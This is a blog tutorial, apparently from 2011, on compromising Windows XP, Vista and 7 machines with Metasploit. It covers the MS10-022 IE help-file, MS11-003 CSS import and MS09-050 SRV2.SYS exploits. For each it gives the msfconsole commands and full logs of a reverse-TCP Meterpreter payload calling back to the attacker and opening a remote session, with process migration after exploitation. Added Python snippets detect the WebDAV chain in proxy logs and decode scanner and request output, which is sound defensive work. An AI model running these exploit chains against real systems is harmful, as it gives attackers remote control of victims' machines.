
Penetrating Windows Systems with the MetaSploit FrameWork – Part III


CONCEPTS OF PENETRATING MACHINES ON THE WINDOWS XP/VISTA/7 PLATFORM USING METASPLOIT FRAMEWORK – Part III

INTERNET EXPLORER HELP EXPLOIT (MS10-022)

This module exploits a flaw in how Internet Explorer 6.0 and 7.0 handle the help file attached to a VBScript message box. The helpfile argument of VBScript's MsgBox is attacker-controlled, so when the user presses "F1" with the box open, the browser launches the Windows Help application (winhlp32.exe) with that path, and it loads and executes an HLP file from a remote SMB or WebDAV share.

In this case the module serves the HLP file over WebDAV, together with an executable payload (.exe) that the HLP file's macro launches from the same share.

msf > use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
msf exploit(ms10_022_ie_vbscript_winhlp32) > show options

Module options (exploit/windows/browser/ms10_022_ie_vbscript_winhlp32):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                yes       The URI to use.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_022_ie_vbscript_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_022_ie_vbscript_winhlp32) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(ms10_022_ie_vbscript_winhlp32) > set LPORT 4442
LPORT => 4442
msf exploit(ms10_022_ie_vbscript_winhlp32) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.34:4442
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.34:80/
[*] Server started.
msf exploit(ms10_022_ie_vbscript_winhlp32) >

[*] Request for "/" does not contain a sub-directory, redirecting to /0iiODtjduwnI55j/ ...
[*] Responding to GET request from 192.168.1.38:1147
[*] Using \\192.168.1.34\0iiODtjduwnI55j\3Kvds7tHD9.hlp ...
[*] Sending HTML page to 192.168.1.38:1147...
[*] Request for "/" does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ ...
[*] Responding to GET request from 192.168.1.38:1147
[*] Using \\192.168.1.34\00R44RaUF2kyMz\QFrKqNnLpDU.hlp ...
[*] Sending HTML page to 192.168.1.38:1147...
[*] Request for "/" does not contain a sub-directory, redirecting to /aATcKpBkDGXspEA/ ...
[*] Responding to WebDAV OPTIONS request from 192.168.1.38:1151
[*] Request for "/00R44RaUF2kyMz" does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending directory multistatus for /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending HLP multistatus for /00R44RaUF2kyMz/QFrKqNnLpDU.hlp ...
[*] Responding to GET request from 192.168.1.38:1151
[*] Sending HLP to 192.168.1.38:1151...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.ANN ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.GID ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.CNT ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.FTG ...
[*] Request for "/00R44RaUF2kyMz" does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending directory multistatus for /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/QFrKqNnLpDU.TMP ...
[*] Request for "/00R44RaUF2kyMz" does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending directory multistatus for /00R44RaUF2kyMz/ ...
[*] Sending 404 for PUT /00R44RaUF2kyMz/QFrKqNnLpDU.TMP ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending EXE multistatus for /00R44RaUF2kyMz/calc.exe ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/shell32.dll ...
[*] Request for "/00R44RaUF2kyMz" does not contain a sub-directory, redirecting to /00R44RaUF2kyMz/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending directory multistatus for /00R44RaUF2kyMz/ ...
[*] Responding to GET request from 192.168.1.38:1151
[*] Sending EXE to 192.168.1.38:1151...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/rsaenh.dll ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/%1 ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/calc.exe.Manifest ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/calc.exe.Local ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/WSOCK32.dll ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/WS2_32.dll ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/WS2HELP.dll ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/hnetcfg.dll ...
[*] Sending stage (749056 bytes) to 192.168.1.38
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/crypt32.dll ...
[*] Meterpreter session 3 opened (192.168.1.34:4442 -> 192.168.1.38:1152) at Fri May 13 23:18:40 +0200 2011
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/IPHLPAPI.DLL ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/WINMM.dll ...
[*] Received WebDAV PROPFIND request from 192.168.1.38:1151
[*] Sending 404 for /00R44RaUF2kyMz/PSAPI.DLL ...

The victim browses to the address where the Metasploit server is listening and is shown a VBScript message box telling them to press "F1". Once they do, winhlp32.exe opens the HLP file from the module's WebDAV share, the help macro launches the payload executable from the same share, and the stage is sent. Reading the log: the first two GETs (source port 1147) are the browser fetching the page; everything on port 1151 is the Windows WebClient service resolving the UNC path over WebDAV, which is why the chain only works when that service is running on the victim. The 404s for .ANN, .GID, .CNT and .FTG are WinHelp looking for the annotation, index, contents and full-text-search companions of the .hlp; the 404s for shell32.dll, rsaenh.dll, WSOCK32.dll and the rest are the Windows loader checking the executable's own directory, here the WebDAV share, for the payload's dependencies before falling back to the system directories. Those remote lookups are the most visible network footprint of the whole chain.
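The sequence above is what the attacker's server sees. From the defender's side, the same chain shows up in the web-proxy log as the Windows WebClient service (the WebDAV mini-redirector) fetching an .hlp from an outside host and, moments later, an executable from that same host. The following Python, an added example and not part of the original post or of Metasploit, runs that check over a few constructed log lines in a simple "client | epoch | method | url | user-agent" layout. The user-agent prefix is the one the WebClient service really sends; the log format, the 300-second window, the suffix list and the function names (parse, detect) are assumptions made for the example.

```python
"""Detect the WebDAV-served HLP pattern of the MS10-022 chain in web-proxy logs.

Added example, not code from the original post or from Metasploit. The only
real-world string it depends on is the User-Agent prefix "Microsoft-WebDAV-MiniRedir",
which the Windows WebClient service sends when it resolves a UNC path over WebDAV.
The log layout ("client | epoch | method | url | user-agent") and the entries
themselves are constructed for the example.
"""
import re

WEBDAV_UA = "Microsoft-WebDAV-MiniRedir"
WINDOW = 300          # assumed: seconds allowed between the .hlp fetch and the executable fetch
EXE_SUFFIXES = (".exe", ".dll", ".scr", ".com")

# Constructed sample: 10.0.0.5 is the victim from the walkthrough above (browser
# hits the page, then WebClient pulls the .hlp and the payload exe from the same
# server); 10.0.0.6 opens an .hlp on the intranet with the browser, which is benign.
SAMPLE_LOG = """\
10.0.0.5 | 1305300000 | GET      | http://203.0.113.9/ | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
10.0.0.5 | 1305300003 | OPTIONS  | http://203.0.113.9/00R44RaUF2kyMz | Microsoft-WebDAV-MiniRedir/5.1.2600
10.0.0.5 | 1305300003 | PROPFIND | http://203.0.113.9/00R44RaUF2kyMz/ | Microsoft-WebDAV-MiniRedir/5.1.2600
10.0.0.5 | 1305300004 | GET      | http://203.0.113.9/00R44RaUF2kyMz/QFrKqNnLpDU.hlp | Microsoft-WebDAV-MiniRedir/5.1.2600
10.0.0.5 | 1305300006 | PROPFIND | http://203.0.113.9/00R44RaUF2kyMz/calc.exe | Microsoft-WebDAV-MiniRedir/5.1.2600
10.0.0.5 | 1305300007 | GET      | http://203.0.113.9/00R44RaUF2kyMz/calc.exe | Microsoft-WebDAV-MiniRedir/5.1.2600
10.0.0.6 | 1305300010 | GET      | http://intranet.example/docs/manual.hlp | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
"""

URL_RE = re.compile(r"^https?://([^/]+)(/.*)?$", re.IGNORECASE)


def parse(log_text):
    """Yield one event dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 5:
            continue
        client, ts, method, url, agent = parts
        m = URL_RE.match(url)
        if not m or not ts.isdigit():
            continue
        host, path = m.group(1).lower(), m.group(2) or "/"
        yield {"client": client, "ts": int(ts), "method": method.upper(),
               "host": host, "path": path, "agent": agent}


def detect(log_text):
    """Return one alert per (client, server) where the WebClient service fetched
    an .hlp and, within WINDOW seconds, an executable from the same server."""
    first_hlp = {}                     # (client, host) -> timestamp of the .hlp GET
    alerts = []
    for ev in parse(log_text):
        if not ev["agent"].startswith(WEBDAV_UA):
            continue                   # a browser opening an .hlp is not this chain
        key = (ev["client"], ev["host"])
        lower = ev["path"].lower()
        if ev["method"] == "GET" and lower.endswith(".hlp"):
            first_hlp.setdefault(key, ev["ts"])
        elif (ev["method"] == "GET" and lower.endswith(EXE_SUFFIXES)
              and key in first_hlp and ev["ts"] - first_hlp[key] <= WINDOW):
            alerts.append({"client": ev["client"], "server": ev["host"],
                           "hlp_at": first_hlp[key], "exe": ev["path"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("HLP-then-EXE over WebDAV:", alert)
```

On a real proxy the strongest signal is simply the mini-redirector user agent talking to a host that is not one of your file servers, so the check would normally also carry an allow-list of internal WebDAV hosts; the hlp-then-exe pairing is what separates this chain from ordinary WebClient traffic.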

CSS RECURSIVE IMPORT (MS11-003)

This is a memory corruption vulnerability in Microsoft's HTML engine (mshtml). It is triggered when a page is parsed whose style sheet imports itself recursively: a C++ object is freed and then used again, a use-after-free rather than a null-pointer dereference, which is what makes it usable for code execution instead of just a crash. Internet Explorer 6, 7 and 8 are vulnerable. The module relies on .NET 2.0.50727 being installed on the target: it serves a .NET DLL (the generic-1305405045.dll request in the log below) that the runtime maps at a predictable address, and that is how it gets around DEP and ASLR, so without that runtime version the exploit does not work.

msf exploit(psexec) > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.33     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.33:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.33:8080/
[*] Server started.

After the user browses to the URL where the server is waiting for a connection, the module hands out the redirect, the HTML page, the .NET DLL and the CSS in turn, and the session comes back. Note the InitialAutoRunScript 'migrate -f' at the end: it moves the Meterpreter out of iexplore.exe into a freshly spawned notepad.exe as soon as the session opens, because the exploited browser is unstable after the use-after-free and may be closed by the user.

msf exploit(ms11_003_ie_css_import) >
[*] 192.168.1.34:49208 Received request for "/"
[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 192.168.1.34:49208 Received request for "/BxMLL.html"
[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import HTML
[*] 192.168.1.34:49208 Received request for "/generic-1305405045.dll"
[*] 192.168.1.34:49208 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[*] 192.168.1.34:49209 Received request for "/favicon.ico"
[*] 192.168.1.34:49209 Sending windows/browser/ms11_003_ie_css_import CSS
[*] 192.168.1.34:49210 Received request for "/\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232"
[*] 192.168.1.34:49210 Sending windows/browser/ms11_003_ie_css_import CSS
[*] Sending stage (749056 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.34:49211) at Sat May 14 22:30:51 +0200 2011
[*] Session ID 1 (192.168.1.33:4444 -> 192.168.1.34:49211) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3276)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1436
[*] New server process: notepad.exe (1436)
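One line in that log deserves a second look: the last CSS request path is printed as octal escapes, because msfconsole shows the raw bytes of the request with Ruby's inspect. The Python below, an added example rather than code from the module or from the post, parses the "Received request for" lines copied from the log above, restores the bytes and shows the code points and the UTF-16LE view of the name. The function names (unescape, analyse) are mine, and the reading of the result, a file name picked for the 32-bit pattern it leaves in memory once IE holds it as a wide string, is the editor's interpretation of a use-after-free exploit; the module does not state it.

```python
"""Decode the request paths printed by the ms11_003_ie_css_import module above.

Added example, not code from Metasploit or the original post. msfconsole prints
the requested path with Ruby's String#inspect, so bytes outside printable ASCII
show up as octal escapes such as \\356\\200\\240. This script takes the "Received
request for" lines from the log above, turns the escapes back into bytes, decodes
them as UTF-8 and shows the UTF-16LE form, which is how the name sits in memory
once IE has converted it to a wide string.
"""
import re
import struct

# Copied from the log above; the closing quote on the long line is repaired.
LOG = r'''
[*] 192.168.1.34:49208 Received request for "/"
[*] 192.168.1.34:49208 Received request for "/BxMLL.html"
[*] 192.168.1.34:49208 Received request for "/generic-1305405045.dll"
[*] 192.168.1.34:49209 Received request for "/favicon.ico"
[*] 192.168.1.34:49210 Received request for "/\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232\356\200\240\341\201\232"
'''

REQ_RE = re.compile(r'^\[\*\] (\S+):(\d+) Received request for "(.*)"$')
OCT_RE = re.compile(r"\\([0-7]{3})")


def unescape(path):
    """Turn Ruby inspect-style octal escapes back into the raw request bytes."""
    out = bytearray()
    pos = 0
    for m in OCT_RE.finditer(path):
        out += path[pos:m.start()].encode("latin-1")
        out.append(int(m.group(1), 8))
        pos = m.end()
    out += path[pos:].encode("latin-1")
    return bytes(out)


def analyse(log_text):
    """One row per request: decoded path, whether it was plain ASCII and, if not,
    its code points and the 32-bit little-endian words of its UTF-16LE encoding."""
    rows = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line.strip())
        if not m:
            continue
        ip, port, raw = m.groups()
        path_bytes = unescape(raw)
        text = path_bytes.decode("utf-8", errors="replace")
        row = {"client": f"{ip}:{port}", "path": text,
               "ascii": path_bytes.isascii(), "codepoints": [], "dwords": []}
        if not row["ascii"]:
            name = text.lstrip("/")
            wide = name.encode("utf-16-le")        # wide-string form of the file name
            row["codepoints"] = [f"U+{ord(c):04X}" for c in name]
            # view the wide string as 32-bit little-endian words: a name chosen
            # for its byte pattern rather than its spelling repeats one value here
            row["dwords"] = [struct.unpack_from("<I", wide, i)[0]
                             for i in range(0, len(wide) - len(wide) % 4, 4)]
        rows.append(row)
    return rows


if __name__ == "__main__":
    for row in analyse(LOG):
        detail = "ASCII" if row["ascii"] else f"{row['codepoints']} -> {[hex(d) for d in row['dwords']]}"
        print(row["client"], repr(row["path"]), detail)
```

For the long path the script reports the pair U+E020 U+105A four times over, which as UTF-16LE is the byte sequence 20 E0 5A 10 repeated, i.e. the value 0x105AE020 four times; the other four requests are ordinary ASCII names.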

SRV2.SYS VULNERABILITY (MS09-050)

This one affects Windows Vista SP1/SP2 and Windows Server 2008 (before R2); the Windows 7 release candidates were also hit, but not the shipped Windows 7, and Vista without a service pack does not appear to be affected. The flaw sits in the request validation code of the SRV2.SYS driver: when a client negotiates SMB2, the driver uses the "Process ID High" field of the SMB header as an index into a function table without checking it against the table's bounds, so a crafted NEGOTIATE PROTOCOL request steers a kernel-mode call through an attacker-chosen pointer. That gives unauthenticated remote code execution in the kernel; since the bug was first published as a remote blue-screen, an attempt that does not land typically crashes the target instead.

To find out whether a host is exposed to this attack, Metasploit's SMB2 scanner is run first:

msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34
msf auxiliary(smb2) > set THREADS 100
THREADS => 100
msf auxiliary(smb2) > run
[*] 192.168.1.34 supports SMB 2 [dialect 255.2] and has been online for 2 hours
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What the scanner proves is that the host speaks SMB2 and, through the DialectRevision it answers with, which family it belongs to; it does not tell you whether the patch is installed. The module prints the two raw bytes of that field joined with a dot, so "255.2" is the little-endian word 0x02FF, the wildcard revision that a server supporting SMB 2.1 or later (Windows 7 / Server 2008 R2) returns when offered the "SMB 2.???" dialect string. A Vista SP1/SP2 or Server 2008 host, the only target this exploit has, answers 0x0202, printed as "2.2". The host scanned here, 192.168.1.34, therefore looks like a Windows 7 / 2008 R2 machine, and the exploit below is pointed at a different host, 192.168.1.40. With the SMB family established, the exploit can be run with a better chance of success, bearing in mind that a miss will crash the target:
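To make that dialect reading concrete, here is an added example (not Metasploit code and not from the original post) that builds two constructed SMB2 NEGOTIATE responses, one answering 0x0202 and one 0x02FF, and parses them the way the scanner does: DialectRevision at body offset 4, SystemTime and ServerStartTime at body offsets 40 and 48, uptime from their difference. The packet layout follows MS-SMB2; the mapping of each dialect to an OS family, the function names (build_negotiate_response, parse_negotiate_response, classify, sample_packets) and the sample values are the editor's.

```python
"""Parse an SMB2 NEGOTIATE response the way the smb2 scanner reports it.

Added example, not code from Metasploit or the original post. The scanner prints
the two raw bytes of DialectRevision joined with a dot, so "255.2" is the
little-endian word 0x02FF. Per MS-SMB2 that is the wildcard revision a server
returns to the "SMB 2.???" dialect string when it supports SMB 2.1 or later
(Windows 7 / Server 2008 R2); a Vista SP1/SP2 or Server 2008 host answers 0x0202
("2.2"). The responses below are constructed; the field layout follows MS-SMB2
2.2.1.2 (header) and 2.2.4 (NEGOTIATE response), without the 4-byte NetBIOS prefix.
"""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
SMB2_NEGOTIATE = 0x0000
SAMPLE_NOW = datetime(2011, 5, 14, 22, 0, tzinfo=timezone.utc)   # constructed clock


def filetime(dt):
    """datetime -> Windows FILETIME (100 ns ticks since 1601-01-01 UTC), integer math only."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def build_negotiate_response(dialect, start, now):
    """Constructed 64-byte SMB2 header followed by a NEGOTIATE response body."""
    header = struct.pack("<4sHHIHHIIQIIQ16s",
                         b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
                         0x1, 0, 0, 0, 0, 0, b"\x00" * 16)   # flags 0x1 = server-to-redir
    body = struct.pack("<HHHH16sIIIIQQHHI",
                       65, 0x1, dialect, 0, b"\x11" * 16,   # size, signing enabled, dialect, reserved, GUID
                       0, 0x10000, 0x10000, 0x10000,        # capabilities, max transact/read/write
                       filetime(now), filetime(start),      # SystemTime, ServerStartTime
                       0, 0, 0)                             # security buffer offset/length, reserved
    return header + body


def classify(dialect):
    """What a given DialectRevision means for the ms09_050 exploit's single target."""
    if dialect == 0x0202:
        return "SMB 2.002: Vista SP1/SP2 or Server 2008 family, the only ms09_050 target"
    if dialect == 0x02FF:
        return "wildcard 0x02FF: SMB 2.1 or later (Windows 7 / 2008 R2), not an ms09_050 target"
    return f"dialect 0x{dialect:04x}: newer SMB2/SMB3 server, not an ms09_050 target"


def parse_negotiate_response(pkt):
    """Extract the fields the scanner reports and say what they mean."""
    if pkt[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet (an SMB1 reply means no SMB2 support)")
    command = struct.unpack_from("<H", pkt, 12)[0]
    if command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE response")
    dialect = struct.unpack_from("<H", pkt, 64 + 4)[0]          # body offset 4
    system_time, start_time = struct.unpack_from("<QQ", pkt, 64 + 40)
    uptime_hours = (system_time - start_time) // (10_000_000 * 3600)
    return {
        "dialect": dialect,
        "scanner_label": f"{dialect & 0xFF}.{dialect >> 8}",    # how the module prints it
        "uptime_hours": uptime_hours,
        "verdict": classify(dialect),
    }


def sample_packets():
    """Two constructed replies: a Vista/2008-style server up 2 h, a Win7-style one up 2.5 h."""
    return {
        "vista": build_negotiate_response(0x0202, SAMPLE_NOW - timedelta(hours=2), SAMPLE_NOW),
        "win7": build_negotiate_response(0x02FF, SAMPLE_NOW - timedelta(hours=2, minutes=30), SAMPLE_NOW),
    }


if __name__ == "__main__":
    for label, pkt in sample_packets().items():
        print(label, parse_negotiate_response(pkt))
```

The wildcard reply only appears when the client offered "SMB 2.???" in an SMB1 multi-protocol negotiate, which is the path the scanner takes; a client that starts straight with an SMB2 NEGOTIATE would see the concrete revision (0x0210 for SMB 2.1) instead.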

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.40     yes       The target address
   RPORT  445              yes       The target port
   WAIT   180              yes       The number of seconds to wait for the attack to complete.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.33     yes       The listen address
   LPORT     4448             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

msf exploit(ms09_050_smb2_negotiate_func_index) > set LPORT 4452
LPORT => 4452
msf exploit(ms09_050_smb2_negotiate_func_index) > set WAIT 5
WAIT => 5
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
[*] Started reverse handler on 192.168.1.33:4452
[*] Connecting to the target (192.168.1.40:445)...
[*] Sending the exploit packet (872 bytes)...
[*] Waiting up to 5 seconds for exploit to trigger...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)

Once the exploit has triggered and the payload has called back within the WAIT window, a Meterpreter session is opened. (The session line shown here comes from a different run than the handler started on 192.168.1.33:4452; its addresses do not match the rest of the transcript.)

tonissh
August 26, 2011 at 3:25 pm

what you publish is great, keep it up
